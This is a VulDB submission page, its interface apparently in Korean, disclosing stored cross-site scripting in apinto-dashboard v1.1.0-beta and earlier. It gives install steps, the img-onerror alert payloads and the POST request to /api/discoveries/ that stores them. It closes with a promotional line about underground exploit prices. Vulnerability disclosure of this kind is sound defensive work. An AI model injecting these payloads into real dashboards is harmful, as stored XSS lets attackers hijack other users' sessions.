제출 #50340: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta정보

제목	apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta
설명	repo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` This problem exists in most pages with tables. For example, on the/discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description Then click Details to trigger. Request URL: /api/discoveries/ Request Method: POST PostData: {"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"} ![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png) ![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png) ![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png) ![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png) Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
사용자	Tomy (UID 34751)
제출	2022. 11. 01. PM 12:09 (4 연령 ago)
모더레이션	2022. 11. 01. PM 04:47 (5 hours later)
상태	수락
VulDB 항목	212639 [eolinker apinto-dashboard /api/discoveries/ 크로스 사이트 스크립팅]
포인트들	17

◂ 이전 개요 다음 ▸

Interested in the pricing of exploits?

See the underground prices here!